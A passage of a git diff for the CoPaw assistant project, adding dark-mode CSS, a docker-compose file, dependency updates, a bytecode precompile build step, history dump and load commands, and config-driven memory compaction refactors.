+html.dark-mode .copaw-picker-cell-in-view.copaw-picker-cell-range-hover::before, +html.dark-mode .ant-picker-cell-in-view.ant-picker-cell-range-hover::before, +html.dark-mode + .copaw-picker-cell-in-view.copaw-picker-cell-range-hover-start::after, +html.dark-mode + .ant-picker-cell-in-view.ant-picker-cell-range-hover-start::after, +html.dark-mode + .copaw-picker-cell-in-view.copaw-picker-cell-range-hover-end::after, +html.dark-mode .ant-picker-cell-in-view.ant-picker-cell-range-hover-end::after { + border-color: #8b87f0 !important; +} + +/* Panel footer (OK button area) */ +html.dark-mode .copaw-picker-footer, +html.dark-mode .ant-picker-footer { + border-top-color: rgba(255, 255, 255, 0.08) !important; + background: #1f1f1f !important; +} + +html.dark-mode .copaw-picker-today-btn, +html.dark-mode .ant-picker-today-btn { + color: #8b87f0 !important; +} + +/* Divider between two panels in RangePicker */ +html.dark-mode .copaw-picker-panel + .copaw-picker-panel, +html.dark-mode .ant-picker-panel + .ant-picker-panel { + border-left-color: rgba(255, 255, 255, 0.08) !important; +} + +/* Modal */ +html.dark-mode .copaw-modal-content, +html.dark-mode .ant-modal-content { + background: #1f1f1f !important; + color: rgba(255, 255, 255, 0.85) !important; + box-shadow: 0 8px 32px rgba(0, 0, 0, 0.5) !important; + border: 1px solid rgba(255, 255, 255, 0.1) !important; +} + +html.dark-mode .copaw-modal-header, +html.dark-mode .ant-modal-header { + background: #1f1f1f !important; + border-bottom-color: rgba(255, 255, 255, 0.08) !important; +} + +html.dark-mode .copaw-modal-title, +html.dark-mode .ant-modal-title { + color: rgba(255, 255, 255, 0.85) !important; +} + +html.dark-mode .copaw-modal-close, +html.dark-mode .ant-modal-close { + color: rgba(255, 255, 255, 0.45) !important; +} + +html.dark-mode .copaw-modal-close:hover, +html.dark-mode .ant-modal-close:hover { + color: rgba(255, 255, 255, 0.85) !important; + background: rgba(255, 255, 255, 0.08) !important; +} + 
+html.dark-mode .copaw-modal-body, +html.dark-mode .ant-modal-body { + background: #1f1f1f !important; + color: rgba(255, 255, 255, 0.85) !important; +} + +html.dark-mode .copaw-modal-footer, +html.dark-mode .ant-modal-footer { + background: #1f1f1f !important; + border-top-color: rgba(255, 255, 255, 0.08) !important; +} + +/* Form labels inside modal */ +html.dark-mode .copaw-modal-body .copaw-form-item-label > label, +html.dark-mode .copaw-modal-body .ant-form-item-label > label, +html.dark-mode .ant-modal-body .ant-form-item-label > label { + color: rgba(255, 255, 255, 0.65) !important; +} + +/* Extra description text inside modal */ +html.dark-mode .copaw-modal-body .copaw-form-item-extra, +html.dark-mode .ant-modal-body .ant-form-item-extra { + color: rgba(255, 255, 255, 0.35) !important; +} + +/* Drawer */ +html.dark-mode .copaw-drawer-content, +html.dark-mode .ant-drawer-content { + background: #1f1f1f !important; +} + +html.dark-mode .copaw-drawer-header, +html.dark-mode .ant-drawer-header { + background: #1f1f1f !important; + border-bottom-color: rgba(255, 255, 255, 0.08) !important; +} + +html.dark-mode .copaw-drawer-title, +html.dark-mode .ant-drawer-title { + color: rgba(255, 255, 255, 0.85) !important; +} + +html.dark-mode .copaw-drawer-close, +html.dark-mode .ant-drawer-close { + color: rgba(255, 255, 255, 0.45) !important; +} + +html.dark-mode .copaw-drawer-close:hover, +html.dark-mode .ant-drawer-close:hover { + color: rgba(255, 255, 255, 0.85) !important; +} + +html.dark-mode .copaw-drawer-body, +html.dark-mode .ant-drawer-body { + background: #1f1f1f !important; + color: rgba(255, 255, 255, 0.85) !important; +} + +html.dark-mode .copaw-drawer-footer, +html.dark-mode .ant-drawer-footer { + background: #1f1f1f !important; + border-top-color: rgba(255, 255, 255, 0.08) !important; +} + +/* Form labels inside drawer */ +html.dark-mode .copaw-drawer-body .copaw-form-item-label > label, +html.dark-mode .copaw-drawer-body .ant-form-item-label > label, 
+html.dark-mode .ant-drawer-body .ant-form-item-label > label { + color: rgba(255, 255, 255, 0.65) !important; +} + +/* Tooltip info icon inside drawer */ +html.dark-mode .copaw-drawer-body .anticon-info-circle, +html.dark-mode .ant-drawer-body .anticon-info-circle { + color: rgba(255, 255, 255, 0.3) !important; +} + +/* Slider */ +html.dark-mode .copaw-slider-rail, +html.dark-mode .ant-slider-rail { + background-color: rgba(255, 255, 255, 0.12) !important; +} + +html.dark-mode .copaw-slider-track, +html.dark-mode .ant-slider-track { + background-color: #615ced !important; +} + +html.dark-mode .copaw-slider-handle::after, +html.dark-mode .ant-slider-handle::after { + box-shadow: 0 0 0 2px #615ced !important; + background-color: #1f1f1f !important; +} + +html.dark-mode .copaw-slider-dot, +html.dark-mode .ant-slider-dot { + border-color: rgba(255, 255, 255, 0.15) !important; + background-color: #2a2a2a !important; +} + +/* Tooltip popup (slider value) */ +html.dark-mode .copaw-tooltip-inner, +html.dark-mode .ant-tooltip-inner { + background-color: #2a2a2a !important; + color: rgba(255, 255, 255, 0.85) !important; +} + +html.dark-mode .copaw-tooltip-arrow::before, +html.dark-mode .ant-tooltip-arrow::before { + background: #2a2a2a !important; +} + +/* Disabled chat input overlay in dark mode */ +html.dark-mode + [class*="chatDisabledOverlay"] + :global([class*="chat-anywhere-input"]), +html.dark-mode [class*="chatDisabledOverlay"] :global([class*="chat-input"]), +html.dark-mode [class*="chatDisabledOverlay"] :global(textarea), +html.dark-mode [class*="chatDisabledOverlay"] :global(input[type="text"]) { + background-color: #2a2a2a !important; +} + +/* Sender area dark mode */ +html.dark-mode [class*="copaw-sender-content"], +html.dark-mode [class*="sender-content"] { + background: #2a2a2a !important; +} + +/* Chat message bubble text in dark mode */ +html.dark-mode [class*="message-item"] [class*="content"], +html.dark-mode [class*="chat-anywhere"] [class*="message"] p, 
+html.dark-mode [class*="chat-anywhere"] [class*="message"] li, +html.dark-mode [class*="chat-anywhere"] [class*="message"] h1, +html.dark-mode [class*="chat-anywhere"] [class*="message"] h2, +html.dark-mode [class*="chat-anywhere"] [class*="message"] h3, +html.dark-mode [class*="chat-anywhere"] [class*="message"] h4, +html.dark-mode [class*="chat-anywhere"] [class*="message"] h5, +html.dark-mode [class*="chat-anywhere"] [class*="message"] h6, +html.dark-mode [class*="chat-anywhere"] [class*="message"] span, +html.dark-mode [class*="chat-anywhere"] [class*="message"] blockquote, +html.dark-mode [class*="chat-anywhere"] [class*="message"] td, +html.dark-mode [class*="chat-anywhere"] [class*="message"] th { + color: rgba(255, 255, 255, 0.85) !important; +} + +html.dark-mode [class*="chat-anywhere"] [class*="message"] strong, +html.dark-mode [class*="chat-anywhere"] [class*="message"] b { + color: rgba(255, 255, 255, 0.95) !important; +} + +html.dark-mode [class*="chat-anywhere"] [class*="message"] code { + color: rgba(255, 255, 255, 0.85) !important; + background: rgba(255, 255, 255, 0.08) !important; +} + +html.dark-mode [class*="chat-anywhere"] [class*="message"] a { + color: #8b87f5 !important; +} + #root { height: 100%; overflow: hidden; diff --git a/console/tsconfig.app.json b/console/tsconfig.app.json index 7c2fd8bc6..5af5e21b0 100644 --- a/console/tsconfig.app.json +++ b/console/tsconfig.app.json @@ -20,7 +20,11 @@ "noUnusedParameters": true, "erasableSyntaxOnly": true, "noFallthroughCasesInSwitch": true, - "noUncheckedSideEffectImports": true + "noUncheckedSideEffectImports": true, + "baseUrl": ".", + "paths": { + "@/*": ["src/*"] + } }, "include": ["src"] } diff --git a/docker-compose.yml b/docker-compose.yml new file mode 100644 index 000000000..24dee0198 --- /dev/null +++ b/docker-compose.yml @@ -0,0 +1,18 @@ +version: '3.8' + +volumes: + copaw-data: + name: copaw-data + copaw-secrets: + name: copaw-secrets + +services: + copaw: + image: 
agentscope/copaw:latest + container_name: copaw + restart: always + ports: + - "127.0.0.1:8088:8088" + volumes: + - copaw-data:/app/working + - copaw-secrets:/app/working.secret diff --git a/pyproject.toml b/pyproject.toml index 2ab5bf624..e33638fb0 100644 --- a/pyproject.toml +++ b/pyproject.toml @@ -5,9 +5,10 @@ description = "CoPaw is a **personal assistant** that runs in your own environme readme = "README.md" requires-python = ">=3.10,<3.14" dependencies = [ - "agentscope==1.0.16.dev0", - "agentscope-runtime==1.1.0", + "agentscope==1.0.17", + "agentscope-runtime==1.1.1", "httpx>=0.27.0", + "packaging>=24.0", "discord-py>=2.3", "dingtalk-stream>=0.24.3", "uvicorn>=0.40.0", @@ -15,7 +16,7 @@ dependencies = [ "playwright>=1.49.0", "questionary>=2.1.1", "mss>=9.0.0", - "reme-ai==0.3.0.6b3", + "reme-ai==0.3.0.8", "transformers>=4.30.0", "python-dotenv>=1.0.0", "python-socks>=2.5.3", @@ -26,7 +27,9 @@ dependencies = [ "pywebview>=4.0", "aiofiles>=24.1.0", "paho-mqtt>=2.0.0", + "wecom-aibot-sdk>=1.0.0", "matrix-nio>=0.24.0", + "jieba>=0.42.1", ] [tool.setuptools.dynamic] @@ -44,6 +47,8 @@ include-package-data = true "agents/skills/**", "tokenizer/**", "security/tool_guard/rules/**", + "security/skill_scanner/rules/**", + "security/skill_scanner/data/**", ] [build-system] @@ -74,8 +79,11 @@ mlx = [ ollama = [ "ollama>=0.6.1", ] +nlp = [ + "hanlp>=2.1.0b50", +] full = [ - "copaw[local,ollama,llamacpp]", + "copaw[local,ollama,llamacpp,nlp]", "mlx-lm>=0.10.0; sys_platform == 'darwin'", ] diff --git a/scripts/pack/README.md b/scripts/pack/README.md index 84e268cce..4e99e41d7 100644 --- a/scripts/pack/README.md +++ b/scripts/pack/README.md @@ -39,6 +39,7 @@ CREATE_ZIP=1 bash ./scripts/pack/build_macos.sh # also create .zip # Creates two launchers: # - CoPaw Desktop.vbs (silent, no console window) # - CoPaw Desktop (Debug).bat (shows console for troubleshooting) +# Note: Pre-compiles all Python files to .pyc for faster startup ``` ## Run from terminal and see logs (macOS) 
diff --git a/scripts/pack/build_win.ps1 b/scripts/pack/build_win.ps1 index b212519f9..4f20da604 100644 --- a/scripts/pack/build_win.ps1 +++ b/scripts/pack/build_win.ps1 @@ -125,6 +125,33 @@ if (Test-Path $CondaUnpack) { Write-Host "[build_win] WARN: conda-unpack.exe not found at $CondaUnpack, skipping." } +Write-Host "== Pre-compiling Python bytecode for faster startup ==" +$pythonExe = Join-Path $EnvRoot "python.exe" +if (Test-Path $pythonExe) { + Write-Host "[build_win] Compiling all .py files to .pyc..." + $compileStart = Get-Date + + # Compile all Python files to bytecode + # -q: quiet mode (only show errors) + # -j 0: use all CPU cores for parallel compilation + & $pythonExe -m compileall -q -j 0 $EnvRoot + + if ($LASTEXITCODE -eq 0) { + $compileEnd = Get-Date + $compileTime = ($compileEnd - $compileStart).TotalSeconds + Write-Host "[build_win] ✓ Bytecode compilation completed in $($compileTime.ToString('F1')) seconds" + + # Count compiled files for reporting + $pycCount = (Get-ChildItem -Path $EnvRoot -Recurse -Filter "*.pyc" -ErrorAction SilentlyContinue | Measure-Object).Count + Write-Host "[build_win] Generated $pycCount .pyc files (these will be included in installer)" + } else { + Write-Host "[build_win] WARN: Bytecode compilation had some errors (exit code: $LASTEXITCODE)" -ForegroundColor Yellow + Write-Host "[build_win] This is usually not critical - app will compile on first run" -ForegroundColor Yellow + } +} else { + Write-Host "[build_win] WARN: python.exe not found at $pythonExe, skipping bytecode compilation" -ForegroundColor Yellow +} + # Main launcher .bat (will be hidden by VBS) $LauncherBat = Join-Path $EnvRoot "CoPaw Desktop.bat" @" diff --git a/scripts/pack/copaw_desktop.nsi b/scripts/pack/copaw_desktop.nsi index 3582ded17..064d988a9 100644 --- a/scripts/pack/copaw_desktop.nsi +++ b/scripts/pack/copaw_desktop.nsi @@ -35,7 +35,7 @@ RequestExecutionLevel user Section "CoPaw Desktop" SEC01 SetOutPath "$INSTDIR" - File /r /x "*.pyc" /x 
"__pycache__" "${UNPACKED}\*.*" + File /r "${UNPACKED}\*.*" WriteRegStr HKCU "Software\CoPaw" "InstallPath" "$INSTDIR" WriteUninstaller "$INSTDIR\Uninstall.exe" diff --git a/src/copaw/__version__.py b/src/copaw/__version__.py index 98a91b118..30316b628 100644 --- a/src/copaw/__version__.py +++ b/src/copaw/__version__.py @@ -1,2 +1,2 @@ # -*- coding: utf-8 -*- -__version__ = "0.0.7.post1" +__version__ = "0.1.0b3" diff --git a/src/copaw/agents/command_handler.py b/src/copaw/agents/command_handler.py index a039cccfb..e7b399c0f 100644 --- a/src/copaw/agents/command_handler.py +++ b/src/copaw/agents/command_handler.py @@ -3,17 +3,20 @@ This module handles system commands like /compact, /new, /clear, etc. """ +import json import logging +from pathlib import Path from typing import TYPE_CHECKING from agentscope.agent._react_agent import _MemoryMark from agentscope.message import Msg, TextBlock -from copaw.config import load_config +from ..constant import DEBUG_HISTORY_FILE, MAX_LOAD_HISTORY_COUNT if TYPE_CHECKING: from .memory import MemoryManager from reme.memory.file_based import ReMeInMemoryMemory + from ..config.config import AgentProfileConfig logger = logging.getLogger(__name__) @@ -35,6 +38,8 @@ class ConversationCommandHandlerMixin: "compact_str", "await_summary", "message", + "dump_history", + "load_history", }, ) @@ -61,6 +66,7 @@ def __init__( memory: "ReMeInMemoryMemory", memory_manager: "MemoryManager | None" = None, enable_memory_manager: bool = True, + agent_config: "AgentProfileConfig | None" = None, ): """Initialize command handler. @@ -69,12 +75,19 @@ def __init__( memory: Agent's ReMeInMemoryMemory instance memory_manager: Optional memory manager instance enable_memory_manager: Whether memory manager is enabled + agent_config: Agent profile configuration containing running + settings including max_input_length and history_max_length. 
""" self.agent_name = agent_name self.memory = memory self.memory_manager = memory_manager self._enable_memory_manager = enable_memory_manager + # Extract configuration from agent_config + self.agent_config = agent_config + self._max_input_length = agent_config.running.max_input_length + self._history_max_length = agent_config.running.history_max_length + def is_command(self, query: str | None) -> bool: """Check if the query is a system command (alias for mixin).""" return self.is_conversation_command(query) @@ -154,6 +167,7 @@ async def _process_new(self, messages: list[Msg], _args: str = "") -> Msg: self.memory_manager.add_async_summary_task(messages=messages) self.memory.clear_compressed_summary() + updated_count = await self.memory.mark_messages_compressed(messages) logger.info(f"Marked {updated_count} messages as compacted") return await self._make_system_msg( @@ -199,11 +213,15 @@ async def _process_history( _args: str = "", ) -> Msg: """Process /history command.""" - config = load_config() - max_input_length = config.agents.running.max_input_length history_str = await self.memory.get_history_str( - max_input_length=max_input_length, + max_input_length=self._max_input_length, ) + + # Truncate if too long + if len(history_str) > self._history_max_length: + half = self._history_max_length // 2 + history_str = f"{history_str[:half]}\n...\n{history_str[-half:]}" + return await self._make_system_msg(history_str) async def _process_await_summary( @@ -285,6 +303,100 @@ async def _process_message( f"- **Content:**\n{msg.content}", ) + async def _process_dump_history( + self, + messages: list[Msg], + _args: str = "", + ) -> Msg: + """Process /dump_history command to save messages to a JSONL file. 
+ + Args: + messages: List of messages in memory + _args: Command arguments (unused) + + Returns: + System message with dump result + """ + history_file = ( + Path(self.agent_config.workspace_dir) / DEBUG_HISTORY_FILE + ) + + try: + with open(history_file, "w", encoding="utf-8") as f: + for msg in messages: + f.write( + json.dumps(msg.to_dict(), ensure_ascii=False) + "\n", + ) + + logger.info(f"Dumped {len(messages)} messages to {history_file}") + return await self._make_system_msg( + f"**History Dumped!**\n\n" + f"- Messages saved: {len(messages)}\n" + f"- File: `{history_file}`", + ) + except Exception as e: + logger.exception(f"Failed to dump history: {e}") + return await self._make_system_msg( + f"**Dump Failed**\n\n" f"- Error: {e}", + ) + + async def _process_load_history( + self, + _messages: list[Msg], + _args: str = "", + ) -> Msg: + """Process /load_history command to load messages from a JSONL file. + + Args: + _messages: List of messages in memory (unused) + _args: Command arguments (unused) + + Returns: + System message with load result + """ + history_file = ( + Path(self.agent_config.workspace_dir) / DEBUG_HISTORY_FILE + ) + + if not history_file.exists(): + return await self._make_system_msg( + f"**Load Failed**\n\n" + f"- File not found: `{history_file}`\n" + f"- Use /dump_history first to create the file", + ) + + try: + loaded_messages: list[Msg] = [] + with open(history_file, encoding="utf-8") as f: + for line in f: + line = line.strip() + if line: + msg_dict = json.loads(line) + loaded_messages.append(Msg.from_dict(msg_dict)) + if len(loaded_messages) >= MAX_LOAD_HISTORY_COUNT: + break + + # Clear existing memory and add loaded messages + self.memory.content.clear() + self.memory.clear_compressed_summary() + for msg in loaded_messages: + await self.memory.add(msg) + + logger.info( + f"Loaded {len(loaded_messages)} messages from {history_file}", + ) + return await self._make_system_msg( + f"**History Loaded!**\n\n" + f"- Messages loaded: 
{len(loaded_messages)}\n" + f"- File: `{history_file}`\n" + f"- Memory cleared before loading", + ) + except Exception as e: + logger.exception(f"Failed to load history: {e}") + return await self._make_system_msg( + f"**Load Failed**\n\n" f"- Error: {e}", + ) + async def handle_conversation_command(self, query: str) -> Msg: """Process conversation system commands. diff --git a/src/copaw/agents/hooks/__init__.py b/src/copaw/agents/hooks/__init__.py index 9aa5ef9eb..0d912efdd 100644 --- a/src/copaw/agents/hooks/__init__.py +++ b/src/copaw/agents/hooks/__init__.py @@ -7,23 +7,6 @@ Available Hooks: - BootstrapHook: First-time setup guidance - MemoryCompactionHook: Automatic context window management - -Example: - >>> from copaw.agents.hooks import BootstrapHook, MemoryCompactionHook - >>> from pathlib import Path - >>> - >>> # Create hooks (they are callables following AgentScope's interface) - >>> bootstrap = BootstrapHook(Path("~/.copaw"), language="zh") - >>> memory_compact = MemoryCompactionHook( - ... memory_manager=mm, - ... memory_compact_threshold=100000, - ... ) - >>> - >>> # Register with agent using AgentScope's register_instance_hook - >>> agent.register_instance_hook("pre_reasoning", "bootstrap", bootstrap) - >>> agent.register_instance_hook( - ... "pre_reasoning", "compact", memory_compact - ... 
) """ from .bootstrap import BootstrapHook diff --git a/src/copaw/agents/hooks/memory_compaction.py b/src/copaw/agents/hooks/memory_compaction.py index 6f145cb36..e48f8ef3f 100644 --- a/src/copaw/agents/hooks/memory_compaction.py +++ b/src/copaw/agents/hooks/memory_compaction.py @@ -8,10 +8,10 @@ import logging from typing import TYPE_CHECKING, Any -from agentscope.agent._react_agent import _MemoryMark, ReActAgent - -from copaw.config import load_config +from agentscope.agent import ReActAgent +from agentscope.message import Msg, TextBlock from copaw.constant import MEMORY_COMPACT_KEEP_RECENT + from ..utils import ( check_valid_messages, safe_count_str_tokens, @@ -20,6 +20,7 @@ if TYPE_CHECKING: from ..memory import MemoryManager from reme.memory.file_based import ReMeInMemoryMemory + from copaw.config.config import AgentProfileConfig logger = logging.getLogger(__name__) @@ -32,14 +33,51 @@ class MemoryCompactionHook: messages while summarizing older conversation history. """ - def __init__(self, memory_manager: "MemoryManager"): + def __init__( + self, + memory_manager: "MemoryManager", + agent_config: "AgentProfileConfig", + ): """Initialize memory compaction hook. Args: memory_manager: Memory manager instance for compaction + agent_config: Agent profile configuration containing running + settings including memory_compact_threshold, + memory_compact_reserve, enable_tool_result_compact, + and tool_result_compact_keep_n. 
""" self.memory_manager = memory_manager + # Extract configuration from agent_config + running_config = agent_config.running + self.memory_compact_threshold = running_config.memory_compact_threshold + self.memory_compact_reserve = running_config.memory_compact_reserve + self.enable_tool_result_compact = ( + running_config.enable_tool_result_compact + ) + self.tool_result_compact_keep_n = ( + running_config.tool_result_compact_keep_n + ) + + @staticmethod + async def _print_status_message( + agent: ReActAgent, + text: str, + ) -> None: + """Print a status message to the agent's output. + + Args: + agent: The agent instance to print the message for. + text: The text content of the status message. + """ + msg = Msg( + name=agent.name, + role="assistant", + content=[TextBlock(type="text", text=text)], + ) + await agent.print(msg) + async def __call__( self, agent: ReActAgent, @@ -69,14 +107,13 @@ async def __call__( system_prompt = agent.sys_prompt compressed_summary = memory.get_compressed_summary() str_token_count = safe_count_str_tokens( - system_prompt + compressed_summary, + (system_prompt or "") + (compressed_summary or ""), ) - config = load_config() - memory_compact_threshold = ( - config.agents.running.memory_compact_threshold + # memory_compact_threshold is always available from config + left_compact_threshold = ( + self.memory_compact_threshold - str_token_count ) - left_compact_threshold = memory_compact_threshold - str_token_count if left_compact_threshold <= 0: logger.warning( @@ -91,19 +128,15 @@ async def __call__( messages = await memory.get_memory(prepend_summary=False) - enable_tool_result_compact = ( - config.agents.running.enable_tool_result_compact - ) - tool_result_compact_keep_n = ( - config.agents.running.tool_result_compact_keep_n - ) - if enable_tool_result_compact and tool_result_compact_keep_n > 0: - compact_msgs = messages[:-tool_result_compact_keep_n] + # Use configured values + if ( + self.enable_tool_result_compact + and 
self.tool_result_compact_keep_n > 0 + ): + compact_msgs = messages[: -self.tool_result_compact_keep_n] await self.memory_manager.compact_tool_result(compact_msgs) - memory_compact_reserve = ( - config.agents.running.memory_compact_reserve - ) + # memory_compact_reserve is always available from config ( messages_to_compact, _, @@ -111,8 +144,8 @@ async def __call__( ) = await self.memory_manager.check_context( messages=messages, memory_compact_threshold=left_compact_threshold, - memory_compact_reserve=memory_compact_reserve, - token_counter=token_counter, + memory_compact_reserve=self.memory_compact_reserve, + as_token_counter=token_counter, ) if not messages_to_compact: @@ -145,21 +178,29 @@ async def __call__( self.memory_manager.add_async_summary_task( messages=messages_to_compact, ) + await self._print_status_message( + agent, + "🔄 Context compaction started...", + ) compact_content = await self.memory_manager.compact_memory( messages=messages_to_compact, previous_summary=memory.get_compressed_summary(), ) + await self._print_status_message( + agent, + "✅ Context compaction completed", + ) + await agent.memory.update_compressed_summary(compact_content) - updated_count = await memory.update_messages_mark( - new_mark=_MemoryMark.COMPRESSED, - msg_ids=[msg.id for msg in messages_to_compact], + updated_count = await memory.mark_messages_compressed( + messages_to_compact, ) logger.info(f"Marked {updated_count} messages as compacted") except Exception as e: - logger.error( + logger.exception( "Failed to compact memory in pre_reasoning hook: %s", e, exc_info=True, diff --git a/src/copaw/agents/md_files/en/BOOTSTRAP.md b/src/copaw/agents/md_files/en/BOOTSTRAP.md index d1ed56185..058b70af1 100644 --- a/src/copaw/agents/md_files/en/BOOTSTRAP.md +++ b/src/copaw/agents/md_files/en/BOOTSTRAP.md @@ -28,7 +28,7 @@ If the user doesn't answer directly, set some conventional defaults yourself. 
Do Update `PROFILE.md` with what you learned (saved in your workspace), writing to the corresponding sections: - **"Identity" section** — your name, nature, vibe, and other things -- **"User Profile" section** — their name, how to address them, timezone, notes +- **"User Profile" section** — their name, how to address them, notes Then open `SOUL.md` together and talk with the user about: diff --git a/src/copaw/agents/md_files/en/PROFILE.md b/src/copaw/agents/md_files/en/PROFILE.md index 10355ba13..bd15798a5 100644 --- a/src/copaw/agents/md_files/en/PROFILE.md +++ b/src/copaw/agents/md_files/en/PROFILE.md @@ -23,7 +23,6 @@ read_when: - **Name:** - **What to call them:** - **Pronouns:** *(optional)* -- **Timezone:** - **Notes:** ### Context diff --git a/src/copaw/agents/md_files/ru/BOOTSTRAP.md b/src/copaw/agents/md_files/ru/BOOTSTRAP.md index ea3790f58..747cf6ac8 100644 --- a/src/copaw/agents/md_files/ru/BOOTSTRAP.md +++ b/src/copaw/agents/md_files/ru/BOOTSTRAP.md @@ -28,7 +28,7 @@ _Вы только что проснулись. Пришло время выяс Обновите `PROFILE.md` тем, что вы узнали (сохранив это в вашей рабочей области), записывая в соответствующие разделы: - **Раздел «Личность» (Identity)** — ваше имя, природа, вайб и прочее. -- **Раздел «Профиль пользователя» (User Profile)** — их имя, как к ним обращаться, часовой пояс, заметки. +- **Раздел «Профиль пользователя» (User Profile)** — их имя, как к ним обращаться, заметки. 
Затем вместе откройте `SOUL.md` и поговорите с пользователем о следующем: diff --git a/src/copaw/agents/md_files/ru/PROFILE.md b/src/copaw/agents/md_files/ru/PROFILE.md index b25f5a3f1..a94605c26 100644 --- a/src/copaw/agents/md_files/ru/PROFILE.md +++ b/src/copaw/agents/md_files/ru/PROFILE.md @@ -23,7 +23,6 @@ read_when: - **Имя:** - **Как к ним обращаться:** - **Местоимения:** *(по желанию)* -- **Часовой пояс:** - **Заметки:** ### Контекст diff --git a/src/copaw/agents/md_files/zh/BOOTSTRAP.md b/src/copaw/agents/md_files/zh/BOOTSTRAP.md index 4d1d51431..ef6186e9a 100644 --- a/src/copaw/agents/md_files/zh/BOOTSTRAP.md +++ b/src/copaw/agents/md_files/zh/BOOTSTRAP.md @@ -28,7 +28,7 @@ _你刚醒来。该搞清楚自己是谁了。_ 把学到的写进 `PROFILE.md` 对应的 section(文件保存在你的工作空间下): - **「身份」section** — 你的名字、定位、风格,以及其他 -- **「用户资料」section** — 他们的名字、称呼、时区、笔记 +- **「用户资料」section** — 他们的名字、称呼、笔记 然后一起打开 `SOUL.md` ,跟用户聊聊: diff --git a/src/copaw/agents/md_files/zh/PROFILE.md b/src/copaw/agents/md_files/zh/PROFILE.md index 56b8bcd09..f81c099a4 100644 --- a/src/copaw/agents/md_files/zh/PROFILE.md +++ b/src/copaw/agents/md_files/zh/PROFILE.md @@ -23,7 +23,6 @@ read_when: - **名字:** - **怎么叫他们:** - **代词:** *(可选)* -- **时区:** - **笔记:** ### 背景 diff --git a/src/copaw/agents/memory/agent_md_manager.py b/src/copaw/agents/memory/agent_md_manager.py index b1ebcfe66..c8ab00309 100644 --- a/src/copaw/agents/memory/agent_md_manager.py +++ b/src/copaw/agents/memory/agent_md_manager.py @@ -4,8 +4,6 @@ from datetime import datetime from pathlib import Path -from ...constant import WORKING_DIR - class AgentMdManager: """Manager for reading and writing markdown files in working and memory @@ -123,6 +121,3 @@ def write_memory_md(self, md_name: str, content: str): md_name += ".md" file_path = self.memory_dir / md_name file_path.write_text(content, encoding="utf-8") - - -AGENT_MD_MANAGER = AgentMdManager(working_dir=WORKING_DIR) diff --git a/src/copaw/agents/memory/memory_manager.py b/src/copaw/agents/memory/memory_manager.py index 
6e30c2ff1..2f2650711 100644
--- a/src/copaw/agents/memory/memory_manager.py
+++ b/src/copaw/agents/memory/memory_manager.py
@@ -8,18 +8,22 @@
 - Vector and full-text search integration
 - Embedding configuration from environment variables
 """
+import asyncio
 import logging
 import os
 import platform
+from typing import TYPE_CHECKING
 
 from agentscope.formatter import FormatterBase
 from agentscope.message import Msg
 from agentscope.model import ChatModelBase
-from agentscope.tool import Toolkit
+from agentscope.tool import Toolkit, ToolResponse
 
 from copaw.agents.model_factory import create_model_and_formatter
 from copaw.agents.tools import read_file, write_file, edit_file
-from copaw.agents.utils import _get_token_counter
-from copaw.config import load_config
+from copaw.agents.utils import _get_copaw_token_counter
+
+if TYPE_CHECKING:
+    from copaw.config.config import AgentProfileConfig
 
 logger = logging.getLogger(__name__)
 
@@ -36,6 +40,9 @@
 class ReMeLight:  # type: ignore
     """Placeholder when reme is not available."""
 
+    async def start(self) -> None:
+        """No-op start when reme is unavailable."""
+
 
 class MemoryManager(ReMeLight):
     """Memory manager that extends ReMeLight for CoPaw agents.
@@ -47,11 +54,19 @@ class MemoryManager(ReMeLight):
     - Configurable vector search and full-text search backends
     """
 
-    def __init__(self, working_dir: str):
+    def __init__(
+        self,
+        working_dir: str,
+        agent_config: "AgentProfileConfig",
+    ):
         """Initialize MemoryManager with ReMeLight configuration.
 
         Args:
             working_dir: Working directory path for memory storage
+            agent_config: Agent profile configuration containing all settings
+                including running config (max_input_length,
+                memory_compact_ratio, memory_reserve_ratio, etc.)
+                and language setting.
 
         Environment Variables:
             EMBEDDING_API_KEY: API key for embedding service
@@ -72,14 +87,21 @@ def __init__(self, working_dir: str):
-        Vector search is enabled only when both EMBEDDING_API_KEY and
-        EMBEDDING_MODEL_NAME are configured.
+        Vector search is enabled only when EMBEDDING_API_KEY,
+        EMBEDDING_BASE_URL, and EMBEDDING_MODEL_NAME are all configured.
""" + # Extract configuration from agent_config + running_config = agent_config.running + self._max_input_length = running_config.max_input_length + self._memory_compact_ratio = running_config.memory_compact_ratio + self._memory_reserve_ratio = running_config.memory_reserve_ratio + self._language = agent_config.language + if not _REME_AVAILABLE: - raise RuntimeError("reme package not installed.") + logger.warning( + "reme package not available, memory features will be limited", + ) + return embedding_api_key = self._safe_str("EMBEDDING_API_KEY", "") - embedding_base_url = self._safe_str( - "EMBEDDING_BASE_URL", - "https://dashscope.aliyuncs.com/compatible-mode/v1", - ) + embedding_base_url = self._safe_str("EMBEDDING_BASE_URL", "") embedding_model_name = self._safe_str("EMBEDDING_MODEL_NAME", "") embedding_dimensions = self._safe_int("EMBEDDING_DIMENSIONS", 1024) embedding_cache_enabled = ( @@ -100,15 +122,26 @@ def __init__(self, working_dir: str): # Determine if vector search should be enabled based on configuration # Vector search requires either an API key or a local model name - vector_enabled = bool(embedding_api_key) and bool(embedding_model_name) + vector_enabled = ( + bool(embedding_api_key) + and bool(embedding_model_name) + and bool(embedding_base_url) + ) if vector_enabled: - logger.info("Vector search enabled.") + logger.info( + f"Vector search enabled. " + f"embedding_api_key={embedding_api_key[:5]}... " + f"embedding_model_name={embedding_model_name} " + f"embedding_base_url={embedding_base_url} ", + ) else: logger.warning( "Vector search disabled. Memory search functionality " "will be restricted. " - "To enable, configure: EMBEDDING_API_KEY, " - "EMBEDDING_BASE_URL, EMBEDDING_MODEL_NAME.", + "To enable, configure: " + f"EMBEDDING_API_KEY={embedding_api_key[:5]}... 
" + f"EMBEDDING_BASE_URL={embedding_base_url} " + f"EMBEDDING_MODEL_NAME={embedding_model_name} ", ) # Check if full-text search (FTS) is enabled via environment variable @@ -154,7 +187,8 @@ def __init__(self, working_dir: str): self.chat_model: ChatModelBase | None = None self.formatter: FormatterBase | None = None - self.token_counter = _get_token_counter() + self.token_counter = _get_copaw_token_counter(agent_config) + self._start_lock = asyncio.Lock() @staticmethod def _safe_str(key: str, default: str) -> str: @@ -234,19 +268,14 @@ async def compact_memory( """ self.prepare_model_formatter() - config = load_config() - max_input_length = config.agents.running.max_input_length - memory_compact_ratio = config.agents.running.memory_compact_ratio - language = config.agents.language - return await super().compact_memory( messages=messages, as_llm=self.chat_model, as_llm_formatter=self.formatter, - token_counter=self.token_counter, - language=language, - max_input_length=max_input_length, - compact_ratio=memory_compact_ratio, + as_token_counter=self.token_counter, + language=self._language, + max_input_length=self._max_input_length, + 